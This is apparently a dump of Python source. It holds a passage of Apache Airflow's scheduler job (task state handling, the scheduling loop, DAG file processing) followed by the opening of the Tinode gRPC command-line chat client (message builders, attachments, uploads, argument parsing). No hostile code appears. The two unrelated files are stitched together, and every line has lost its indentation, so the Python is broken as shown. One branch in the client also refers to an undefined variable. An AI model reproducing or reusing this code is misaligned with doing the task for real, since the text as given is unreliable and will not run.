:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessor(file_path,
pickle_dags,
self.dag_ids,
zombies)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while True:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
tn-cli.py | #!/usr/bin/env python
# coding=utf-8
"""Python implementation of Tinode command line client using gRPC."""
# To make print() compatible between p2 and p3
from __future__ import print_function
import argparse
import base64
import grpc
import json
from PIL import Image
try:
from io import BytesIO as memory_io
except ImportError:
from cStringIO import StringIO as memory_io
import mimetypes
import os
import pkg_resources
import platform
from prompt_toolkit import PromptSession
import random
import re
import requests
import shlex
import sys
import threading
import time
# Import generated grpc modules
from tinode_grpc import pb
from tinode_grpc import pbx
import tn_globals
from tn_globals import printerr
from tn_globals import printout
from tn_globals import stdoutln
from tn_globals import to_json
APP_NAME = "tn-cli"
APP_VERSION = "1.5.8"
PROTOCOL_VERSION = "0"
LIB_VERSION = pkg_resources.get_distribution("tinode_grpc").version
GRPC_VERSION = pkg_resources.get_distribution("grpcio").version
# Maximum in-band (included directly into the message) attachment size which fits into
# a message of 256K in size, assuming base64 encoding and 1024 bytes of overhead.
# This is size of an object *before* base64 encoding is applied.
MAX_INBAND_ATTACHMENT_SIZE = 195840
# Absolute maximum attachment size to be used with the server = 8MB.
MAX_EXTERN_ATTACHMENT_SIZE = 1 << 23
# Maximum allowed linear dimension of an inline image in pixels.
MAX_IMAGE_DIM = 768
# 5 seconds timeout for .await/.must commands.
AWAIT_TIMEOUT = 5
# This is needed for gRPC SSL to work correctly.
os.environ["GRPC_SSL_CIPHER_SUITES"] = "HIGH+ECDSA"
# Setup crash handler: close input reader otherwise a crash
# makes terminal session unusable.
def exception_hook(type, value, traceBack):
if tn_globals.InputThread != None:
tn_globals.InputThread.join(0.3)
sys.excepthook = exception_hook
# Enable the following variables for debugging.
# os.environ["GRPC_TRACE"] = "all"
# os.environ["GRPC_VERBOSITY"] = "INFO"
# Regex to match and parse subscripted entries in variable paths.
RE_INDEX = re.compile(r"(\w+)\[(\w+)\]")
# Macros module (may be None).
macros = None
# Python is retarded.
class dotdict(dict):
"""dot.notation access to dictionary attributes"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
# Pack user's name and avatar into a theCard.
def makeTheCard(fn, photofile):
card = None
if (fn != None and fn.strip() != "") or photofile != None:
card = {}
if fn != None:
card['fn'] = fn.strip()
if photofile != None:
if photofile == '':
# Delete the avatar.
card['photo'] = {
'data': '␡'
}
else:
try:
f = open(photofile, 'rb')
# File extension is used as a file type
mimetype = mimetypes.guess_type(photofile)
if mimetype[0]:
mimetype = mimetype[0].split("/")[1]
else:
mimetype = 'jpeg'
data = base64.b64encode(f.read())
# python3 fix.
if type(data) is not str:
data = data.decode()
card['photo'] = {
'data': data,
'type': mimetype
}
f.close()
except IOError as err:
stdoutln("Error opening '" + photofile + "':", err)
return card
# Create drafty representation of a message with an inline image.
def inline_image(filename):
try:
im = Image.open(filename, 'r')
width = im.width
height = im.height
format = im.format if im.format else "JPEG"
if width > MAX_IMAGE_DIM or height > MAX_IMAGE_DIM:
# Scale the image
scale = min(min(width, MAX_IMAGE_DIM) / width, min(height, MAX_IMAGE_DIM) / height)
width = int(width * scale)
height = int(height * scale)
resized = im.resize((width, height))
im.close()
im = resized
mimetype = 'image/' + format.lower()
bitbuffer = memory_io()
im.save(bitbuffer, format=format)
data = base64.b64encode(bitbuffer.getvalue())
# python3 fix.
if type(data) is not str:
data = data.decode()
result = {
'txt': ' ',
'fmt': [{'len': 1}],
'ent': [{'tp': 'IM', 'data':
{'val': data, 'mime': mimetype, 'width': width, 'height': height,
'name': os.path.basename(filename)}}]
}
im.close()
return result
except IOError as err:
stdoutln("Failed processing image '" + filename + "':", err)
return None
# Create a drafty message with an *in-band* attachment.
def attachment(filename):
try:
f = open(filename, 'rb')
# Try to guess the mime type.
mimetype = mimetypes.guess_type(filename)
data = base64.b64encode(f.read())
# python3 fix.
if type(data) is not str:
data = data.decode()
result = {
'fmt': [{'at': -1}],
'ent': [{'tp': 'EX', 'data':{
'val': data, 'mime': mimetype, 'name':os.path.basename(filename)
}}]
}
f.close()
return result
except IOError as err:
stdoutln("Error processing attachment '" + filename + "':", err)
return None
# encode_to_bytes takes an object/dictionary and converts it to json-formatted byte array.
def encode_to_bytes(src):
if src == None:
return None
return json.dumps(src).encode('utf-8')
# Parse credentials
def parse_cred(cred):
result = None
if cred != None:
result = []
for c in cred.split(","):
parts = c.split(":")
result.append(pb.ClientCred(method=parts[0] if len(parts) > 0 else None,
value=parts[1] if len(parts) > 1 else None,
response=parts[2] if len(parts) > 2 else None))
return result
# Read a value in the server response using dot notation, i.e.
# $user.params.token or $meta.sub[1].user
def getVar(path):
if not path.startswith("$"):
return path
parts = path.split('.')
if parts[0] not in tn_globals.Variables:
return None
var = tn_globals.Variables[parts[0]]
if len(parts) > 1:
parts = parts[1:]
for p in parts:
x = None
m = RE_INDEX.match(p)
if m:
p = m.group(1)
if m.group(2).isdigit():
x = int(m.group(2))
else:
x = m.group(2)
var = getattr(var, p)
if x or x == 0:
var = var[x]
if isinstance(var, bytes):
var = var.decode('utf-8')
return var
# Dereference values, i.e. cmd.val == $usr => cmd.val == <actual value of usr>
def derefVals(cmd):
for key in dir(cmd):
if not key.startswith("__") and key != 'varname':
val = getattr(cmd, key)
if type(val) is str and val.startswith("$"):
setattr(cmd, key, getVar(val))
return cmd
# Prints prompt and reads lines from stdin.
def readLinesFromStdin():
if tn_globals.IsInteractive:
while True:
try:
line = tn_globals.Prompt.prompt()
yield line
except EOFError as e:
# Ctrl+D.
break
else:
# iter(...) is a workaround for a python2 bug https://bugs.python.org/issue3907
for cmd in iter(sys.stdin.readline, ''):
yield cmd
# Stdin reads a possibly multiline input from stdin and queues it for asynchronous processing.
def stdin(InputQueue):
partial_input = ""
try:
for cmd in readLinesFromStdin():
cmd = cmd.strip()
# Check for continuation symbol \ in the end of the line.
if len(cmd) > 0 and cmd[-1] == "\\":
cmd = cmd[:-1].rstrip()
if cmd:
if partial_input:
partial_input += " " + cmd
else:
partial_input = cmd
if tn_globals.IsInteractive:
sys.stdout.write("... ")
sys.stdout.flush()
continue
# Check if we have cached input from a previous multiline command.
if partial_input:
if cmd:
partial_input += " " + cmd
InputQueue.append(partial_input)
partial_input = ""
continue
InputQueue.append(cmd)
# Stop processing input
if cmd == 'exit' or cmd == 'quit' or cmd == '.exit' or cmd == '.quit':
return
except Exception as ex:
printerr("Exception in stdin", ex)
InputQueue.append('exit')
# Constructing individual messages
# {hi}
def hiMsg(id, background):
tn_globals.OnCompletion[str(id)] = lambda params: print_server_params(params)
return pb.ClientMsg(hi=pb.ClientHi(id=str(id), user_agent=APP_NAME + "/" + APP_VERSION + " (" +
platform.system() + "/" + platform.release() + "); gRPC-python/" + LIB_VERSION + "+" + GRPC_VERSION,
ver=LIB_VERSION, lang="EN", background=background))
# {acc}
def accMsg(id, cmd, ignored):
if cmd.uname:
cmd.scheme = 'basic'
if cmd.password == None:
cmd.password = ''
cmd.secret = str(cmd.uname) + ":" + str(cmd.password)
if cmd.secret:
if cmd.scheme == None:
cmd.scheme = 'basic'
cmd.secret = cmd.secret.encode('utf-8')
else:
cmd.secret = b''
state = None
if cmd.suspend == 'true':
state = 'susp'
elif cmd.suspend == 'false':
state = 'ok'
cmd.public = encode_to_bytes(makeTheCard(cmd.fn, cmd.photo))
cmd.private = encode_to_bytes(cmd.private)
return pb.ClientMsg(acc=pb.ClientAcc(id=str(id), user_id=cmd.user, state=state,
scheme=cmd.scheme, secret=cmd.secret, login=cmd.do_login, tags=cmd.tags.split(",") if cmd.tags else None,
desc=pb.SetDesc(default_acs=pb.DefaultAcsMode(auth=cmd.auth, anon=cmd.anon),
public=cmd.public, private=cmd.private),
cred=parse_cred(cmd.cred)), on_behalf_of=tn_globals.DefaultUser)
# {login}
def loginMsg(id, cmd, args):
if cmd.secret == None:
if cmd.uname == None:
cmd.uname = ''
if cmd.password == None:
cmd.password = ''
cmd.secret = str(cmd.uname) + ":" + str(cmd.password)
cmd.secret = cmd.secret.encode('utf-8')
elif cmd.scheme == "basic":
# Assuming secret is a uname:password string.
cmd.secret = str(cmd.secret).encode('utf-8')
else:
# All other schemes: assume secret is a base64-encoded string
cmd.secret = base64.b64decode(cmd.secret)
msg = pb.ClientMsg(login=pb.ClientLogin(id=str(id), scheme=cmd.scheme, secret=cmd.secret,
cred=parse_cred(cmd.cred)))
if args.no_cookie or not tn_globals.IsInteractive:
tn_globals.OnCompletion[str(id)] = lambda params: handle_login(params)
else:
tn_globals.OnCompletion[str(id)] = lambda params: save_cookie(params)
return msg
# {sub}
def subMsg(id, cmd, ignored):
if not cmd.topic:
cmd.topic = tn_globals.DefaultTopic
if cmd.get_query:
cmd.get_query = pb.GetQuery(what=" ".join(cmd.get_query.split(",")))
cmd.public = encode_to_bytes(makeTheCard(cmd.fn, cmd.photo))
cmd.private = encode_to_bytes(cmd.private)
return pb.ClientMsg(sub=pb.ClientSub(id=str(id), topic=cmd.topic,
set_query=pb.SetQuery(
desc=pb.SetDesc(public=cmd.public, private=cmd.private,
default_acs=pb.DefaultAcsMode(auth=cmd.auth, anon=cmd.anon)),
sub=pb.SetSub(mode=cmd.mode),
tags=cmd.tags.split(",") if cmd.tags else None),
get_query=cmd.get_query), on_behalf_of=tn_globals.DefaultUser)
# {leave}
def leaveMsg(id, cmd, ignored):
if not cmd.topic:
cmd.topic = tn_globals.DefaultTopic
return pb.ClientMsg(leave=pb.ClientLeave(id=str(id), topic=cmd.topic, unsub=cmd.unsub), on_behalf_of=tn_globals.DefaultUser)
# {pub}
def pubMsg(id, cmd, ignored):
if not cmd.topic:
cmd.topic = tn_globals.DefaultTopic
head = {}
if cmd.drafty or cmd.image or cmd.attachment:
head['mime'] = encode_to_bytes('text/x-drafty')
# Excplicitly provided 'mime' will override the one assigned above.
if cmd.head:
for h in cmd.head.split(","):
key, val = h.split(":")
head[key] = encode_to_bytes(val)
content = json.loads(cmd.drafty) if cmd.drafty \
else inline_image(cmd.image) if cmd.image \
else attachment(cmd.attachment) if cmd.attachment \
else cmd.content
if not content:
return None
return pb.ClientMsg(pub=pb.ClientPub(id=str(id), topic=cmd.topic, no_echo=True,
head=head, content=encode_to_bytes(content)), on_behalf_of=tn_globals.DefaultUser)
# {get}
def getMsg(id, cmd, ignored):
if not cmd.topic:
cmd.topic = tn_globals.DefaultTopic
what = []
if cmd.desc:
what.append("desc")
if cmd.sub:
what.append("sub")
if cmd.tags:
what.append("tags")
if cmd.data:
what.append("data")
if cmd.cred:
what.append("cred")
return pb.ClientMsg(get=pb.ClientGet(id=str(id), topic=cmd.topic,
query=pb.GetQuery(what=" ".join(what))), on_behalf_of=tn_globals.DefaultUser)
# {set}
def setMsg(id, cmd, ignored):
if not cmd.topic:
cmd.topic = tn_globals.DefaultTopic
if cmd.public == None:
cmd.public = encode_to_bytes(makeTheCard(cmd.fn, cmd.photo))
else:
cmd.public = encode_to_bytes(cmd.public)
cmd.private = encode_to_bytes(cmd.private)
cred = parse_cred(cmd.cred)
if cred:
if len(cred) > 1:
stdoutln('Warning: multiple credentials specified. Will use only the first one.')
cred = cred[0]
return pb.ClientMsg(set=pb.ClientSet(id=str(id), topic=cmd.topic,
query=pb.SetQuery(
desc=pb.SetDesc(default_acs=pb.DefaultAcsMode(auth=cmd.auth, anon=cmd.anon),
public=cmd.public, private=cmd.private),
sub=pb.SetSub(user_id=cmd.user, mode=cmd.mode),
tags=cmd.tags.split(",") if cmd.tags else None,
cred=cred)), on_behalf_of=tn_globals.DefaultUser)
# {del}
def delMsg(id, cmd, ignored):
if not cmd.what:
stdoutln("Must specify what to delete")
return None
enum_what = None
before = None
seq_list = None
cred = None
if cmd.what == 'msg':
enum_what = pb.ClientDel.MSG
cmd.topic = cmd.topic if cmd.topic else tn_globals.DefaultTopic
if not cmd.topic:
stdoutln("Must specify topic to delete messages")
return None
if cmd.user:
stdoutln("Unexpected '--user' parameter")
return None
if not cmd.seq:
stdoutln("Must specify message IDs to delete")
return None
if cmd.seq == 'all':
seq_list = [pb.SeqRange(low=1, hi=0x8FFFFFF)]
else:
# Split a list like '1,2,3,10-22' into ranges.
try:
seq_list = []
for item in cmd.seq.split(','):
if '-' in item:
low, hi = [int(x.strip()) for x in item.split('-')]
if low>=hi or low<=0:
stdoutln("Invalid message ID range {0}-{1}".format(low, hi))
return None
seq_list.append(pb.SeqRange(low=low, hi=hi))
else:
seq_list.append(pb.SeqRange(low=int(item.strip())))
except ValueError as err:
stdoutln("Invalid message IDs: {0}".format(err))
return None
elif cmd.what == 'sub':
cmd.topic = cmd.topic if cmd.topic else tn_globals.DefaultTopic
cmd.user = cmd.user if cmd.user else tn_globals.DefaultUser
if not cmd.user or not cmd.topic:
stdoutln("Must specify topic and user to delete subscription")
return None
enum_what = pb.ClientDel.SUB
elif cmd.what == 'topic':
cmd.topic = cmd.topic if cmd.topic else tn_globals.DefaultTopic
if cmd.user:
stdoutln("Unexpected '--user' parameter")
return None
if not cmd.topic:
stdoutln("Must specify topic to delete")
return None
enum_what = pb.ClientDel.TOPIC
elif cmd.what == 'user':
cmd.user = cmd.user if cmd.user else tn_globals.DefaultUser
if cmd.topic:
stdoutln("Unexpected '--topic' parameter")
return None
enum_what = pb.ClientDel.USER
elif cmd.what == 'cred':
if cmd.user:
stdoutln("Unexpected '--user' parameter")
return None
if cmd.topic != 'me':
stdoutln("Topic must be 'me'")
return None
cred = parse_cred(cmd.cred)
if cred is None:
stdoutln("Failed to parse credential '{0}'".format(cmd.cred))
return None
cred = cred[0]
enum_what = pb.ClientDel.CRED
else:
stdoutln("Unrecognized delete option '", cmd.what, "'")
return None
msg = pb.ClientMsg(on_behalf_of=tn_globals.DefaultUser)
# Field named 'del' conflicts with the keyword 'del. This is a work around.
xdel = getattr(msg, 'del')
"""
setattr(msg, 'del', pb.ClientDel(id=str(id), topic=topic, what=enum_what, hard=hard,
del_seq=seq_list, user_id=user))
"""
xdel.id = str(id)
xdel.what = enum_what
if cmd.hard != None:
xdel.hard = cmd.hard
if seq_list != None:
xdel.del_seq.extend(seq_list)
if cmd.user != None:
xdel.user_id = cmd.user
if cmd.topic != None:
xdel.topic = cmd.topic
if cred != None:
xdel.cred.MergeFrom(cred)
return msg
# {note}
def noteMsg(id, cmd, ignored):
if not cmd.topic:
cmd.topic = tn_globals.DefaultTopic
enum_what = None
if cmd.what == 'kp':
enum_what = pb.KP
cmd.seq = None
elif cmd.what == 'read':
enum_what = pb.READ
cmd.seq = int(cmd.seq)
elif what == 'recv':
enum_what = pb.RECV
cmd.seq = int(cmd.seq)
return pb.ClientMsg(note=pb.ClientNote(topic=cmd.topic, what=enum_what, seq_id=cmd.seq), on_behalf_of=tn_globals.DefaultUser)
# Upload file out of band over HTTP(S) (not gRPC).
def upload(id, cmd, args):
try:
scheme = 'https' if args.ssl else 'http'
result = requests.post(
scheme + '://' + args.web_host + '/v' + PROTOCOL_VERSION + '/file/u/',
headers = {
'X-Tinode-APIKey': args.api_key,
'X-Tinode-Auth': 'Token ' + tn_globals.AuthToken,
'User-Agent': APP_NAME + " " + APP_VERSION + "/" + LIB_VERSION
},
data = {'id': id},
files = {'file': (cmd.filename, open(cmd.filename, 'rb'))})
handle_ctrl(dotdict(json.loads(result.text)['ctrl']))
except Exception as ex:
stdoutln("Failed to upload '{0}'".format(cmd.filename), ex)
return None
# Given an array of parts, parse commands and arguments
def parse_cmd(parts):
parser = None
if parts[0] == "acc":
parser = argparse.ArgumentParser(prog=parts[0], description='Create or alter an account')
parser.add_argument('--user', default='new', help='ID of the account to update')
parser.add_argument('--scheme', default=None, help='authentication scheme, default=basic')
parser.add_argument('--secret', default=None, help='secret for authentication')
parser.add_argument('--uname', default=None, help='user name for basic authentication')
parser.add_argument('--password', default=None, help='password for basic authentication')
parser.add_argument('--do-login', action='store_true', help='login with the newly created account')
parser.add_argument('--tags', action=None, help='tags for user discovery, comma separated list without spaces')
parser.add_argument('--fn', default=None, help='user\'s human name')
parser.add_argument('--photo', default=None, help='avatar file name')
parser.add_argument('--private', default=None, help='user\'s private info')
parser.add_argument('--auth', default=None, help='default access mode for authenticated users')
parser.add_argument('--anon', default=None, help='default access mode for anonymous users')
parser.add_argument('--cred', default=None, help='credentials, comma separated list in method:value format, e.g. email:test@example.com,tel:12345')
parser.add_argument('--suspend', default=None, help='true to suspend the account, false to un-suspend')
elif parts[0] == "del":
parser = argparse.ArgumentParser(prog=parts[0], description='Delete message(s), subscription, topic, user')
parser.add_argument('what', default=None, help='what to delete')
parser.add_argument('--topic', default=None, help='topic being affected')
parser.add_argument('--user', default=None, help='either delete this user or a subscription with this user')
parser.add_argument('--seq', default=None, help='"all" or a list of comma- and dash-separated message IDs to delete, e.g. "1,2,9-12"')
parser.add_argument('--hard', action='store_true', help='request to hard-delete')
parser.add_argument('--cred', help='credential to delete in method:value format, e.g. email:test@example.com, tel:12345')
elif parts[0] == "login":
parser = argparse.ArgumentParser(prog=parts[0], description='Authenticate current session')
parser.add_argument('secret', nargs='?', default=argparse.SUPPRESS, help='secret for authentication')
parser.add_argument('--scheme', default='basic', help='authentication schema, default=basic')
parser.add_argument('--secret', dest='secret', default=None, help='secret for authentication')
parser.add_argument('--uname', default=None, help='user name in basic authentication scheme')
parser.add_argument('--password', default=None, help='password in basic authentication scheme')
parser.add_argument('--cred', default=None, help='credentials, comma separated list in method:value:response format, e.g. email:test@example.com,tel:12345')
elif parts[0] == "sub":
parser = argparse.ArgumentParser(prog=parts[0], description='Subscribe to topic')
parser.add_argument('topic', nargs='?', default=argparse.SUPPRESS, help='topic to subscribe to')
parser.add_argument('--topic', dest='topic', default=None, help='topic to subscribe to')
parser.add_argument('--fn', default=None, help='topic\'s user-visible name')
